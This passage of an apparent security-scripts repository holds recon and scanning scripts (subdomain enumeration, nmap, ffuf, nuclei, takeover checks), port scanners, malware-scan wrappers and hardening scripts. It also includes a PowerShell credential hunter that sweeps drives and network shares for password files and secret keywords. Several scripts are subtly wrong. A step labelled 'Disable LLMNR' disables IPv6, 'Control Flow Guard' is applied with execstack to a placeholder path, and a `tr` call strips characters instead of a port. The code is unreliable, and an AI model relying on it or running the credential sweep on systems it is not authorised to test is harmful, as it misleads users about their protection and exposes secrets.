73 | echo "findomain is already installed." 74 | fi 75 | 76 | if ! command -v httprobe &> /dev/null 77 | then 78 | echo "httprobe is not installed. Installing..." 79 | go get -u github.com/tomnomnom/httprobe 80 | else 81 | echo "httprobe is already installed." 82 | fi 83 | 84 | if ! command -v ffuf &> /dev/null 85 | then 86 | echo "ffuf is not installed. Installing..." 87 | go get -u github.com/ffuf/ffuf 88 | else 89 | echo "ffuf is already installed." 90 | fi 91 | 92 | if ! command -v gau &> /dev/null 93 | then 94 | echo "gau is not installed. Installing..." 95 | go get -u github.com/lc/gau 96 | else 97 | echo "gau is already installed." 98 | fi 99 | 100 | if ! command -v qsreplace &> /dev/null 101 | then 102 | echo "qsreplace is not installed. Installing..." 103 | go get -u github.com/tomnomnom/qsreplace 104 | else 105 | echo "qsreplace is already installed." 106 | fi 107 | 108 | if ! command -v nuclei &> /dev/null 109 | then 110 | echo "nuclei is not installed. Installing..." 111 | GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei 112 | else 113 | echo "nuclei is already installed." 114 | fi 115 | 116 | # Create directories for output 117 | if [ ! -d "$1" ]; then 118 | mkdir $1 119 | fi 120 | if [ ! -d "$1/recon" ]; then 121 | mkdir $1/recon 122 | fi 123 | 124 | # Subdomain enumeration 125 | echo "[+] Starting subdomain enumeration..." 126 | assetfinder $1 | sort -u | httprobe -s -p https:443 | sed 's/https\\\\?:\\\\/\\\\///' | tr -d ': 443' >> $1/recon/alive.txt 127 | amass intel -d $1 -whois -active -o $1/recon/amass.txt 128 | cat $1/recon/amass.txt | awk '{print $2}' | sort -u | httprobe -s -p https:443 | sed 's/https\\\\?:\\\\/\\\\///' | tr -d ': 443' >> $1/recon/alive.txt 129 | subfinder -d $1 -o $1/recon/subfinder.txt 130 | cat $1/recon/subfinder.txt | sort -u | httprobe -s -p https:443 | sed 's/https\\\\?:\\\\/\\\\///' | tr -d ': 443' >> $1/recon/alive.txt 131 | findomain -t $1 -u $1/recon/findomain.txt 132 | cat $1/recon/findomain.txt | sort -u | httprobe -s -p https:443 | sed 's/https\\\\?:\\\\/\\\\///' | tr -d ': 443' >> $1/recon/alive.txt 133 | curl -s "" | jq -r '.[].name_value' | sed 's/\\\\*\\\\.//g' | sort -u | httprobe -s -p https:443 | sed 's/https\\\\?:\\\\/\\\\///' | tr -d ': 443' >> $1/recon/alive.txt 134 | cat $1/recon/alive.txt | sort -u >> $1/recon/final.txt 135 | 136 | # Port scanning 137 | echo "[+] Starting port scanning..." 138 | nmap -sS -T4 -p- -oA $1/recon/nmap $1 139 | cat $1/recon/nmap.nmap | grep 'open' | awk '{print $1}' | tr -d 'Nmap' | tr -d '()' | tr -d '/' | sort -u | awk '{print "https://"$1}' >> $1/recon/alive.txt 140 | cat $1/recon/alive.txt | sort -u >> $1/recon/final.txt 141 | 142 | # Directory brute-forcing 143 | echo "[+] Starting directory brute-forcing..." 144 | ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -mc 200 -t 100 -o $1/recon/ffuf.txt 145 | ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -mc 200 -t 100 -o $1/recon/ffuf_params.txt 146 | 147 | # Parameter fuzzing 148 | echo "[+] Starting parameter fuzzing..." 149 | gau $1 | grep -E "\\\\.php|\\\\.aspx|\\\\.jsp|\\\\.json" | qsreplace VALUE | while read url; do ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $url -mc 200 -t 100 -o $1/recon/ffuf_params.txt ; done 150 | 151 | # Vulnerability scanning 152 | echo "[+] Starting vulnerability scanning..." 153 | nuclei -l $1/recon/final.txt -t cves/ -t default-logins/ -t exposed-panels/ -t exposures/ -t files/ -t generic-detections/ -t misconfigurations/ -t takeovers/ -t technologies/ -t tokens/ -t workflows/ -t vulnerabilities/ 154 | 155 | -------------------------------------------------------------------------------- /scripts/recon/nmap-dir-vuln.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Set the target URL 4 | url="https://example.com" 5 | 6 | # Set the output file 7 | output_file="recon_results.txt" 8 | 9 | # Perform subdomain enumeration 10 | echo "Performing subdomain enumeration..." 11 | subdomains=$(subfinder -d $url) 12 | echo $subdomains >> $output_file 13 | 14 | # Perform directory and file discovery 15 | echo "Performing directory and file discovery..." 16 | dirsearch -u $url -e * >> $output_file 17 | 18 | # Check for open ports and running services 19 | echo "Performing port scan..." 20 | nmap -sC -sV $url >> $output_file & wait 21 | 22 | # Check for known vulnerabilities 23 | echo "Checking for known vulnerabilities..." 24 | vulners -s $url >> $output_file 25 | 26 | echo "Recon complete!" 27 | -------------------------------------------------------------------------------- /scripts/recon/oneLineSubs.md: -------------------------------------------------------------------------------- 1 | ` 2 | subfinder -d example.com -silent | assetfinder --subs-only | httprobe -c 50 | tee temp_urls.txt | { while read url; do echo $url | waybackurls; echo $url | hakrawler; done } | sort -u > output.txt && rm temp_urls.txt 3 | ` 4 | -------------------------------------------------------------------------------- /scripts/recon/port-report.py: -------------------------------------------------------------------------------- 1 | #!/bin/python3 2 | 3 | import sys 4 | import socket 5 | from datetime import datetime 6 | import argparse 7 | from threading import Thread 8 | import time 9 | import random 10 | 11 | # Define command-line arguments 12 | parser = argparse.ArgumentParser() 13 | parser.add_argument("ip", help="IP address of the target host") 14 | parser.add_argument("-p", "--ports", help="Port range to scan (default: 1-1000)") 15 | args = parser.parse_args() 16 | 17 | # Define target IP and port range 18 | target = args.ip 19 | if args.ports: 20 | start_port, end_port = map(int, args.ports.split("-")) 21 | else: 22 | start_port, end_port = 1, 1000 23 | 24 | # Add a banner 25 | print("-" * 50) 26 | print("[*] Scanning Target...") 27 | print("[*] Time Started: "+str(datetime.now())) 28 | print("[*] Target IP: {}".format(target)) 29 | print("[*] Port range: {}-{}".format(start_port, end_port)) 30 | print("-" * 50) 31 | 32 | # Create output file 33 | file = open("scan_results.txt", "w") 34 | file.write("Scan Results for: " + target + "\n") 35 | file.write("Time Started: " + str(datetime.now()) + "\n") 36 | 37 | # Randomize the order in which ports are scanned 38 | ports = random.sample(range(start_port, end_port+1), end_port-start_port+1) 39 | 40 | # Check for open ports on a router like dns 41 | def scan(port): 42 | try: 43 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 44 | s.settimeout(1) 45 | result = s.connect_ex((target, port)) 46 | if result == 0: 47 | print(f"Port {port} is open") 48 | file.write(f"Port {port} is open\n") 49 | s.close() 50 | except Exception as e: 51 | print(f"Error: {e}") 52 | 53 | # Use threading to speed up the scanning process 54 | threads = [] 55 | for port in ports: 56 | t = Thread(target=scan, args=(port,)) 57 | threads.append(t) 58 | t.start() 59 | time.sleep(0.1) # add delay between each connection attempt 60 | 61 | # Wait for all threads to complete 62 | for t in threads: 63 | t.join() 64 | 65 | # Add footer to output file 66 | file.write("\nTime Completed: " + str(datetime.now())) 67 | file.close() 68 | -------------------------------------------------------------------------------- /scripts/recon/portscanner.py: -------------------------------------------------------------------------------- 1 | #!/bin/python3 2 | 3 | import sys 4 | import socket 5 | from datetime import datetime 6 | 7 | #Define target 8 | if len(sys.argv) == 2: 9 | target = socket.gethostbyname(sys.argv[1]) # translate to ipv4 10 | else: 11 | print("Invalid amount of args") 12 | print("Syntax: python scanner.py ") 13 | 14 | #Add a banner 15 | print("-" * 50) 16 | print("[*] Scanning Target...") 17 | print("[*] Time Started: "+str(datetime.now())) 18 | print("-" * 50) 19 | 20 | #check for open ports on a router like dns 21 | try: 22 | for port in range(1,500): 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | socket.setdefaulttimeout(1) 25 | result = s.connect_ex((target,port)) 26 | if result == 0: 27 | print(f"Port {port} is open") 28 | s.close() 29 | 30 | except KeyboardInterrupt: 31 | print("\nExiting Program") 32 | sys.exit() 33 | 34 | except socket.gaierror: 35 | print("Hostname could not be resolved") 36 | sys.exit() 37 | 38 | except socket.error: 39 | print("Could not connect to server.") 40 | sys.exit() 41 | 42 | -------------------------------------------------------------------------------- /scripts/recon/smb-scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Script to check for signs of hacking and malware on a system 4 | 5 | # Get interface 6 | interface=$(ip addr show | grep -E '^[0-9]:' | awk '{print $2}' | tr -d :) 7 | 8 | # Get local broadcast IP 9 | broadcast_ip=$(ifconfig $interface | grep -E 'inet[^6]' | grep -oE 'broadcast [0-9.]+' | awk '{print $2}') 10 | 11 | # Create a log file with a timestamp 12 | log_file="scan_$(date +%Y-%m-%d_%H-%M-%S).txt" 13 | touch $log_file 14 | 15 | # Check for unauthorized SSH access 16 | echo "Checking for unauthorized SSH access..." | tee -a $log_file 17 | ssh_connections=$(lsof -i :22) 18 | unauthorized_connections=$(echo "$ssh_connections" | grep -v "root" | grep -v "authorized_user") 19 | 20 | if [ -n "$unauthorized_connections" ]; then 21 | echo "Unauthorized SSH connections detected:" | tee -a $log_file 22 | echo "$unauthorized_connections" | tee -a $log_file 23 | else 24 | echo "No unauthorized SSH connections detected." | tee -a $log_file 25 | fi 26 | 27 | # Check for open SMB ports 28 | echo "Checking for open SMB ports..." | tee -a $log_file 29 | open_ports=$(netstat -an | grep ":445\|:139") 30 | 31 | if [ -n "$open_ports" ]; then 32 | echo "Open SMB ports detected:" | tee -a $log_file 33 | echo "$open_ports" | tee -a $log_file 34 | else 35 | echo "No open SMB ports detected." | tee -a $log_file 36 | fi 37 | 38 | #Check for SMB shares 39 | echo "Checking for SMB shares..." | tee -a $log_file 40 | smb_shares=$(smbclient -L $broadcast_ip) 41 | 42 | if [ -n "$smb_shares" ]; then 43 | echo "SMB shares detected:" | tee -a $log_file 44 | echo "$smb_shares" | tee -a $log_file 45 | else 46 | echo "No SMB shares detected." | tee -a $log_file 47 | fi 48 | 49 | # Check for SMB vulnerabilities 50 | echo "Checking for SMB vulnerabilities..." | tee -a $log_file 51 | smb_vulnerabilities=$(nmap --script smb-vuln* -p 445 $broadcast_ip) 52 | 53 | if [ -n "$smb_vulnerabilities" ]; then 54 | echo "SMB vulnerabilities detected:" | tee -a $log_file 55 | echo "$smb_vulnerabilities" | tee -a $log_file 56 | else 57 | echo "No SMB vulnerabilities detected." | tee -a $log_file 58 | fi 59 | 60 | echo "Scan complete. Results saved in $log_file" | tee -a $log_file 61 | -------------------------------------------------------------------------------- /scripts/recon/subrecon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # subdomain recon script 3 | # Usage: ./subrecon.sh domain.com 4 | 5 | # Declare your target domain 6 | domain=$1 7 | 8 | # Check if domain is passed as an argument 9 | if [ -z "$domain" ] 10 | then 11 | echo "Usage: ./subdomain_recon.sh domain.com" 12 | exit 1 13 | fi 14 | 15 | # Use subfinder to find subdomains 16 | echo "[*] Running subfinder..." 17 | subfinder -d $domain -silent > subdomains.txt 18 | 19 | # Use alterx to generate permutations of these subdomains 20 | echo "[*] Running alterx..." 21 | cat subdomains.txt | alterx > altered_subdomains.txt 22 | 23 | # Use altdns to generate additional permutations 24 | echo "[*] Running altdns..." 25 | altdns -i altered_subdomains.txt -o data_output -w words.txt -r -S 26 | 27 | # Use assetfinder and hakcheckurl to validate these subdomains 28 | echo "[*] Running assetfinder and hakcheckurl..." 29 | cat data_output | assetfinder -subs-only | hakcheckurl | grep -v 404 > valid_subdomains.txt 30 | 31 | # Use Amass to gather additional intel 32 | echo "[*] Running Amass..." 33 | amass enum -passive -d $domain >> valid_subdomains.txt 34 | 35 | # Use gobuster on the identified subdomains 36 | echo "[*] Running Gobuster..." 37 | while read subdomain; do 38 | gobuster dir -u $subdomain -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php -o "$subdomain.txt" 39 | done < valid_subdomains.txt 40 | 41 | # Clean up 42 | rm subdomains.txt altered_subdomains.txt data_output 43 | -------------------------------------------------------------------------------- /scripts/recon/system-filescan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Create a log file with the current date and time 4 | LOG_FILE="recon_report_$(date +%Y-%m-%d_%H-%M-%S).txt" 5 | 6 | # Find all SUID files and redirect stderr to /dev/null 7 | echo "### SUID files ###" >> $LOG_FILE 8 | find / -perm -u=s -type f -exec file {} \; 2>/dev/null >> $LOG_FILE 9 | echo "" >> $LOG_FILE 10 | 11 | # Find all world-writable files and redirect stderr to /dev/null 12 | echo "### World-writable files ###" >> $LOG_FILE 13 | find / -perm -o+w -type f 2>/dev/null >> $LOG_FILE 14 | echo "" >> $LOG_FILE 15 | 16 | # List all files in /etc/cron* and its subdirectories 17 | echo "### Files in /etc/cron* ###" >> $LOG_FILE 18 | ls -laR /etc/cron* >> $LOG_FILE 19 | echo "" >> $LOG_FILE 20 | 21 | # Show contents of /etc/issue 22 | echo "### /etc/issue contents ###" >> $LOG_FILE 23 | cat /etc/issue >> $LOG_FILE 24 | echo "" >> $LOG_FILE 25 | 26 | # Show output of uname -a command 27 | echo "### OS and Kernel ###" >> $LOG_FILE 28 | uname -a >> $LOG_FILE 29 | echo "" >> $LOG_FILE 30 | 31 | # Show installed packages 32 | echo "### Installed packages ###" >> $LOG_FILE 33 | dpkg -l >> $LOG_FILE 34 | echo "" >> $LOG_FILE 35 | 36 | # Show last logged-in users using last 37 | echo "### last users output ###" >> $LOG_FILE 38 | last >> $LOG_FILE 39 | echo "" >> $LOG_FILE 40 | -------------------------------------------------------------------------------- /scripts/recon/theEnumerator.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Credit TheCyberMentor 3 | 4 | url=$1 5 | if [ ! -d "$url" ];then 6 | mkdir $url 7 | fi 8 | if [ ! -d "$url/recon" ];then 9 | mkdir $url/recon 10 | fi 11 | # if [ ! -d '$url/recon/eyewitness' ];then 12 | # mkdir $url/recon/eyewitness 13 | # fi 14 | if [ ! -d "$url/recon/scans" ];then 15 | mkdir $url/recon/scans 16 | fi 17 | if [ ! -d "$url/recon/httprobe" ];then 18 | mkdir $url/recon/httprobe 19 | fi 20 | if [ ! -d "$url/recon/potential_takeovers" ];then 21 | mkdir $url/recon/potential_takeovers 22 | fi 23 | if [ ! -d "$url/recon/wayback" ];then 24 | mkdir $url/recon/wayback 25 | fi 26 | if [ ! -d "$url/recon/wayback/params" ];then 27 | mkdir $url/recon/wayback/params 28 | fi 29 | if [ ! -d "$url/recon/wayback/extensions" ];then 30 | mkdir $url/recon/wayback/extensions 31 | fi 32 | if [ ! -f "$url/recon/httprobe/alive.txt" ];then 33 | touch $url/recon/httprobe/alive.txt 34 | fi 35 | if [ ! -f "$url/recon/final.txt" ];then 36 | touch $url/recon/final.txt 37 | fi 38 | 39 | echo "[+] Harvesting subdomains with assetfinder..." 40 | assetfinder $url >> $url/recon/assets.txt 41 | cat $url/recon/assets.txt | grep $1 >> $url/recon/final.txt 42 | rm $url/recon/assets.txt 43 | 44 | #echo "[+] Double checking for subdomains with amass..." 45 | #amass enum -d $url >> $url/recon/f.txt 46 | #sort -u $url/recon/f.txt >> $url/recon/final.txt 47 | #rm $url/recon/f.txt 48 | 49 | echo "[+] Probing for alive domains..." 50 | cat $url/recon/final.txt | sort -u | httprobe -s -p https:443 | sed 's/https\?:\/\///' | tr -d ':443' >> $url/recon/httprobe/a.txt 51 | sort -u $url/recon/httprobe/a.txt > $url/recon/httprobe/alive.txt 52 | rm $url/recon/httprobe/a.txt 53 | 54 | echo "[+] Checking for possible subdomain takeover..." 55 | 56 | if [ ! -f "$url/recon/potential_takeovers/potential_takeovers.txt" ];then 57 | touch $url/recon/potential_takeovers/potential_takeovers.txt 58 | fi 59 | 60 | subjack -w $url/recon/final.txt -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.go -v 3 -o $url/recon/potential_takeovers/potential_takeovers.txt 61 | 62 | echo "[+] Scanning for open ports..." 63 | nmap -iL $url/recon/httprobe/alive.txt -T4 -oA $url/recon/scans/scanned.txt 64 | 65 | echo "[+] Scraping wayback data..." 66 | cat $url/recon/final.txt | waybackurls >> $url/recon/wayback/wayback_output.txt 67 | sort -u $url/recon/wayback/wayback_output.txt 68 | 69 | echo "[+] Pulling and compiling all possible params found in wayback data..." 70 | cat $url/recon/wayback/wayback_output.txt | grep '?*=' | cut -d '=' -f 1 | sort -u >> $url/recon/wayback/params/wayback_params.txt 71 | for line in $(cat $url/recon/wayback/params/wayback_params.txt);do echo $line'=';done 72 | 73 | echo "[+] Pulling and compiling js/php/aspx/jsp/json files from wayback output..." 74 | for line in $(cat $url/recon/wayback/wayback_output.txt);do 75 | ext="${line##*.}" 76 | if [[ "$ext" == "js" ]]; then 77 | echo $line >> $url/recon/wayback/extensions/js1.txt 78 | sort -u $url/recon/wayback/extensions/js1.txt >> $url/recon/wayback/extensions/js.txt 79 | fi 80 | if [[ "$ext" == "html" ]];then 81 | echo $line >> $url/recon/wayback/extensions/jsp1.txt 82 | sort -u $url/recon/wayback/extensions/jsp1.txt >> $url/recon/wayback/extensions/jsp.txt 83 | fi 84 | if [[ "$ext" == "json" ]];then 85 | echo $line >> $url/recon/wayback/extensions/json1.txt 86 | sort -u $url/recon/wayback/extensions/json1.txt >> $url/recon/wayback/extensions/json.txt 87 | fi 88 | if [[ "$ext" == "php" ]];then 89 | echo $line >> $url/recon/wayback/extensions/php1.txt 90 | sort -u $url/recon/wayback/extensions/php1.txt >> $url/recon/wayback/extensions/php.txt 91 | fi 92 | if [[ "$ext" == "aspx" ]];then 93 | echo $line >> $url/recon/wayback/extensions/aspx1.txt 94 | sort -u $url/recon/wayback/extensions/aspx1.txt >> $url/recon/wayback/extensions/aspx.txt 95 | fi 96 | done 97 | 98 | rm $url/recon/wayback/extensions/js1.txt 99 | rm $url/recon/wayback/extensions/jsp1.txt 100 | rm $url/recon/wayback/extensions/json1.txt 101 | rm $url/recon/wayback/extensions/php1.txt 102 | rm $url/recon/wayback/extensions/aspx1.txt 103 | #echo "[+] Running eyewitness against all compiled domains..." 104 | #python3 EyeWitness/EyeWitness.py --web -f $url/recon/httprobe/alive.txt -d $url/recon/eyewitness --resolve 105 | -------------------------------------------------------------------------------- /scripts/recon/tool-heavy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Set the target URL 4 | url="https://example.com" 5 | 6 | # Set the output file 7 | output_file="recon_results.txt" 8 | 9 | # List of tools to be installed 10 | tools=("subfinder" "Sublist3r" "MassDNS" "dirsearch" "nmap" "vulners" "GetJS" "GoLinkFinder" "getallurls" "WayBackUrls" "WayBackRobots" "FFuF" "XSSHunter" "SQLMap" "XXEInjector" "SSRFDetector" "GitTools" "gitallsecrets" "RaceTheWeb" "CORStest" "EyeWitness" "parameth") 11 | 12 | # Install the tools 13 | echo "Installing tools..." 14 | for tool in "${tools[@]}" 15 | do 16 | apt-get install $tool &> /dev/null && echo "$tool installed" || echo "$tool installation failed" 17 | done 18 | 19 | # Perform subdomain enumeration 20 | echo "Performing subdomain enumeration..." 21 | subdomains=$(subfinder -d $url) 22 | subdomains+=$(Sublist3r -d $url) 23 | subdomains+=$(MassDNS -d $url) 24 | echo $subdomains >> $output_file 25 | 26 | # Perform directory and file discovery 27 | echo "Performing directory and file discovery..." 28 | dirsearch -u $url -e * >> $output_file 29 | 30 | # Check for open ports and running services 31 | echo "Performing port scan..." 32 | nmap -sC -sV $url >> $output_file 33 | 34 | # Check for known vulnerabilities 35 | echo "Checking for known vulnerabilities..." 36 | vulners -s $url >> $output_file 37 | 38 | # Retrieve JavaScript files 39 | echo "Retrieving JavaScript files..." 40 | GetJS -u $url >> $output_file 41 | 42 | # Find links 43 | echo "Finding links..." 44 | GoLinkFinder -u $url >> $output_file 45 | 46 | # Get all URLs 47 | echo "Retrieving all URLs..." 48 | getallurls -u $url >> $output_file 49 | 50 | # Check for URLs in Wayback Machine 51 | echo "Checking for URLs in Wayback Machine..." 52 | WayBackUrls -u $url >> $output_file 53 | 54 | # Check for robots.txt in Wayback Machine 55 | echo "Checking for robots.txt in Wayback Machine..." 56 | WayBackRobots -u $url >> $output_file 57 | 58 | # Check for Forced Browsing vulnerabilities 59 | echo "Checking for Forced Browsing vulnerabilities..." 60 | FFuF -u $url >> $output_file 61 | 62 | # Check for XSS vulnerabilities 63 | echo "Checking for XSS vulnerabilities..." 64 | XSSHunter -u $url >> $output_file 65 | 66 | # Check for SQL injection vulnerabilities 67 | echo "Checking for SQL injection vulnerabilities..." 68 | SQLMap -u $url >> $output_file 69 | 70 | # Check for XXE vulnerabilities 71 | echo "Checking for XXE vulnerabilities..." 72 | XXEInjector -u $url >> $output_file 73 | 74 | # Check for SSRF vulnerabilities 75 | echo "Checking for SSRF vulnerabilities..." 76 | SSRFDetector -u $url >> $output_file 77 | 78 | # Check for secrets in Git repository 79 | echo "Checking for secrets in Git repository..." 80 | GitTools -u $url >> $output_file 81 | gitallsecrets -u $url >> $output_file 82 | 83 | # Check for race condition vulnerabilities 84 | echo "Checking for race condition vulnerabilities..." 85 | RaceTheWeb -u $url >> $output_file 86 | 87 | # Check for CORS misconfigurations 88 | echo "Checking for CORS misconfigurations..." 89 | CORStest -u $url >> $output_file 90 | 91 | # Take screenshots 92 | echo "Taking screenshots..." 93 | EyeWitness -u $url >> $output_file 94 | 95 | # Check for parameter tampering vulnerabilities 96 | echo "Checking for parameter tampering vulnerabilities..." 97 | parameth -u $url >> $output_file 98 | 99 | echo "Recon complete!" 100 | -------------------------------------------------------------------------------- /scripts/recon/windows_cred_hunter.ps1: -------------------------------------------------------------------------------- 1 | # Define the directories to search 2 | $searchDirs = @( 3 | "C:\", # Root of C: drive 4 | "\\", # Network shares (you might need to specify more specific network paths) 5 | "$env:USERPROFILE\Documents", # User Documents 6 | "$env:USERPROFILE\Desktop", # User Desktop 7 | "$env:USERPROFILE\AppData", # User AppData 8 | "$env:ALLUSERSPROFILE", # All Users Profile 9 | "C:\Windows", # Windows directory 10 | "C:\Program Files", # Program Files 11 | "C:\Program Files (x86)", # Program Files (x86) 12 | "C:\inetpub\wwwroot", # Default IIS web root 13 | "C:\Scripts", # Custom Scripts directory 14 | "C:\Shares", # Custom Shares directory 15 | "$env:PUBLIC", # Public directory 16 | "C:\SharePoint" # SharePoint directory (if applicable) 17 | ) 18 | 19 | # Define the specific files to search for 20 | $specificFiles = @( 21 | "unattend.xml", 22 | "web.config", 23 | "pass.txt", 24 | "passwords.docx", 25 | "passwords.xlsx" 26 | ) 27 | 28 | # Define the keywords to search for in files 29 | $keywords = @( 30 | "password", 31 | "passwd", 32 | "credentials", 33 | "secret", 34 | "key", 35 | "token", 36 | "KeePass" 37 | ) 38 | 39 | # Define the specific file patterns to search for 40 | $filePatterns = @( 41 | "*.txt", 42 | "*.docx", 43 | "*.xlsx", 44 | "*.xml", 45 | "*.config", 46 | "*.ps1", 47 | "*.bat", 48 | "*.sh" 49 | ) 50 | 51 | # Function to search for specific files 52 | function Search-SpecificFiles { 53 | param ( 54 | [string[]]$directories, 55 | [string[]]$files 56 | ) 57 | foreach ($dir in $directories) { 58 | foreach ($file in $files) { 59 | Get-ChildItem -Path $dir -Filter $file -Recurse -ErrorAction SilentlyContinue | ForEach-Object { 60 | Write-Host "Found file: $($_.FullName)" 61 | } 62 | } 63 | } 64 | } 65 | 66 | # Function to search for specific keywords in files 67 | function Search-Keywords { 68 | param ( 69 | [string[]]$directories, 70 | [string[]]$keywords 71 | ) 72 | foreach ($dir in $directories) { 73 | Get-ChildItem -Path $dir -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object { 74 | $fileContent = Get-Content -Path $_.FullName -ErrorAction SilentlyContinue 75 | foreach ($keyword in $keywords) { 76 | if ($fileContent -match $keyword) { 77 | Write-Host "Found keyword '$keyword' in file: $($_.FullName)" 78 | } 79 | } 80 | } 81 | } 82 | } 83 | 84 | # Function to search for specific file patterns 85 | function Search-FilePatterns { 86 | param ( 87 | [string[]]$directories, 88 | [string[]]$patterns 89 | ) 90 | foreach ($dir in $directories) { 91 | foreach ($pattern in $patterns) { 92 | Get-ChildItem -Path $dir -Filter $pattern -Recurse -ErrorAction SilentlyContinue | ForEach-Object { 93 | Write-Host "Found file: $($_.FullName)" 94 | } 95 | } 96 | } 97 | } 98 | 99 | # Execute the search functions 100 | Search-SpecificFiles -directories $searchDirs -files $specificFiles 101 | Search-Keywords -directories $searchDirs -keywords $keywords 102 | Search-FilePatterns -directories $searchDirs -patterns $filePatterns 103 | -------------------------------------------------------------------------------- /scripts/security/detection/linux_mal_scanner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Check if root 4 | if [ $(id -u) -ne 0 ]; then 5 | echo "Script must be run as root" 6 | exit 1 7 | fi 8 | 9 | # Install required packages if not already installed 10 | required_packages=(rkhunter clamav lynis chkrootkit) 11 | for package in "${required_packages[@]}"; do 12 | if ! command -v "$package" &> /dev/null; then 13 | echo "$package not found, installing..." 14 | sudo apt install -y "$package" 15 | else 16 | echo "$package already installed" 17 | fi 18 | done 19 | 20 | # Run system scans and save output to a file 21 | echo "Running system scans..." 22 | sudo rkhunter --update 23 | sudo rkhunter --check 24 | sudo clamscan -r / 25 | sudo lynis audit system 26 | sudo chkrootkit 27 | 28 | echo "System scans completed." 29 | -------------------------------------------------------------------------------- /scripts/security/detection/macos_malscan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Check if Homebrew is installed 4 | if ! command -v brew >/dev/null 2>&1; then 5 | echo "Homebrew is not installed. Please install Homebrew to proceed." 6 | exit 1 7 | fi 8 | 9 | # Install necessary tools using Homebrew 10 | echo "Installing necessary tools using Homebrew..." 11 | brew install rkhunter clamav lynis chkrootkit pip-audit 12 | 13 | # Run system scans with sudo 14 | echo "Running rkhunter..." 15 | pip-audit --fix 16 | sudo rkhunter --config-check 17 | sudo rkhunter --check --vl 18 | echo "Running clamav scan..." 19 | clamscan -r / 20 | echo "Running lynis system audit as sudo..." 21 | sudo lynis audit system 22 | echo "Checking for rootkits with chrootkit..." 23 | sudo chkrootkit 24 | 25 | echo "System scans completed." 26 | -------------------------------------------------------------------------------- /scripts/security/hardening/LinuxSecure.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # LinuxSecure.sh - A script to harden the security of a Linux system 4 | # by disabling unnecessary services and protocols, enabling security features, 5 | # and asking the user for confirmation before making any changes. 6 | 7 | echo "Disable SMBv1?" 8 | read -p "(Y/N) " input 9 | if [[ $input =~ ^[Yy]$ ]]; then 10 | sudo apt-get remove --purge samba-common-bin 11 | sudo apt-get autoremove 12 | fi 13 | 14 | echo "Disable Remote Registry Service?" 15 | read -p "(Y/N) " input 16 | if [[ $input =~ ^[Yy]$ ]]; then 17 | sudo service rpcbind stop 18 | sudo update-rc.d rpcbind disable 19 | fi 20 | 21 | echo "Disable LLMNR?" 22 | read -p "(Y/N) " input 23 | if [[ $input =~ ^[Yy]$ ]]; then 24 | sudo echo "net.ipv6.conf.all.disable_ipv6 = 1" | sudo tee -a /etc/sysctl.conf 25 | sudo sysctl -p 26 | fi 27 | 28 | echo "Disable NetBIOS over TCP/IP?" 29 | read -p "(Y/N) " input 30 | if [[ $input =~ ^[Yy]$ ]]; then 31 | sudo apt-get install iptables-persistent 32 | sudo iptables -A INPUT -p tcp --dport 137 -j DROP 33 | sudo iptables -A INPUT -p udp --dport 137 -j DROP 34 | sudo netfilter-persistent save 35 | fi 36 | 37 | echo "Enable Control Flow Guard (CFG)?" 38 | read -p "(Y/N) " input 39 | if [[ $input =~ ^[Yy]$ ]]; then 40 | sudo apt-get install execstack 41 | sudo execstack -c /usr/bin/program_name 42 | fi 43 | 44 | echo "Done!" 45 | -------------------------------------------------------------------------------- /scripts/security/hardening/LinuxServerSecure.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Create a sudo user 4 | read -p "Create a new sudo user (Allows for administrative actions with accountability)? (y/n): " create_user 5 | if [ "$create_user" == "y" ]; then 6 | read -p "Enter the username for the new sudo user: " username 7 | adduser "$username" 8 | usermod -aG sudo "$username" 9 | fi 10 | 11 | # Use Secure Shell Protocol 12 | read -p "Secure the Secure Shell Protocol (Enhances SSH security by disabling password authentication)? (y/n): " use_ssh 13 | if [ "$use_ssh" == "y" ]; then 14 | sed -i 's/#PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config 15 | systemctl restart sshd 16 | fi 17 | 18 | # Setup a basic firewall (UFW) 19 | read -p "Setup a basic firewall (UFW) (Add rules in next step)? (y/n): " setup_ufw 20 | if [ "$setup_ufw" == "y" ]; then 21 | ufw default deny incoming 22 | ufw default allow outgoing 23 | if [ "$use_ssh" == "y" ]; then 24 | read -p "Do you want to allow SSH (port 22) by default (Allows SSH connections)? (y/n): " allow_ssh 25 | if [ "$allow_ssh" == "y" ]; then 26 | ufw allow 22/tcp 27 | fi 28 | fi 29 | read -p "Enter any additional ports to open (comma-separated): " ports 30 | IFS=',' read -ra ADDR <<< "$ports" 31 | for port in "${ADDR[@]}"; do 32 | ufw allow "$port" 33 | done 34 | ufw enable 35 | ufw reload 36 | fi 37 | 38 | # Disable unwanted Linux services 39 | read -p "Disable vulnerable Linux services (Reduces attack surface by disabling rpcbind NFS and SMB)? (y/n): " disable_services 40 | if [ "$disable_services" == "y" ]; then 41 | systemctl disable rpcbind 42 | systemctl disable nfs 43 | systemctl disable smb 44 | echo "Disabled rpcbind, NFS, and SMB services." 45 | fi 46 | 47 | # Disable ICMP 48 | read -p "Disable ICMP (Prevents attackers from using the ping command against the server)? (y/n): " disable_icmp 49 | if [ "$disable_icmp" == "y" ]; then 50 | echo "net.ipv4.icmp_echo_ignore_all = 1" >> /etc/sysctl.conf 51 | sysctl -p 52 | fi 53 | 54 | # Enable SELinux 55 | read -p "Enable SELinux (Enhances security through 